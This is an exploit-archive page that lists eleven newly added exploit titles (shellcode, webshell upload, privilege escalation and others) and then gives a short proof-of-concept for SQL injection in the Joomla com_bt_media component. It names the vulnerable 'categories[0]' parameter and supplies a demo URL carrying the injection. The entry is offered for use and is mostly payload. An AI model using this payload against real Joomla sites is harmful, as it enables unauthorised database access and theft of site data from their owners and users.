
11 new exploits Linux Kernel 2.2. / 2.4.x - /proc Filesystem Potential Information Disclosure Vulnerability Linux Kernel 2.2.x / 2.4.x - /proc Filesystem Potential Information Disclosure Vulnerability WordPress Ultimate Product Catalog Plugin 3.8.1 - Privilege Escalation Linux x86_64 execve Shellcode - 15 bytes sNews CMS 1.7.1 - Multiple Vulnerabilities Joomla BT Media (com_bt_media) Component - SQL Injection Premium SEO Pack 1.9.1.3 - wp_options Overwrite Windows XP - 10 - Download & Execute Shellcode Tomabo MP4 Player 3.11.6 - SEH Based Stack Overflow (msf) Airia - (Add Content) CSRF Airia - Webshell Upload Exploit Symphony CMS 2.6.7 - Session Fixation ACROS Security 0patch 2016.05.19.539 - (0PatchServicex64.exe) Unquoted Service Path Privilege Escalation
26 lines
No EOL
735 B
Text
Executable file
26 lines
No EOL
735 B
Text
Executable file
######################
|
|
# Exploit Title : Joomla com_bt_media - SQL Injection
|
|
# Exploit Author : Persian Hack Team
|
|
# Vendor Homepage : http://extensions.joomla.org/extension/bt-media-gallery
|
|
# Category: [ Webapps ]
|
|
# Tested on: [ Win ]
|
|
# Version: 1.0
|
|
# Date: 2016/06/19
|
|
######################
|
|
#
|
|
# PoC:
|
|
|
|
# categories[0]= Parameter Vulnerable To SQL
|
|
|
|
# Demo :
|
|
|
|
# http://server/index.php?option=com_bt_media&view=list&categories[0]=%277&Itemid=134
|
|
|
|
|
|
# Please Free Yaser Ebrahimi
|
|
|
|
######################
|
|
# Discovered by : Mojtaba MobhaM
|
|
# Greetz : T3NZOG4N & FireKernel & Masood Ostad & Dr.Koorangi & Milad Hacking & JOK3R And All Persian Hack Team Members
|
|
# Homepage : persian-team.ir
|
|
###################### |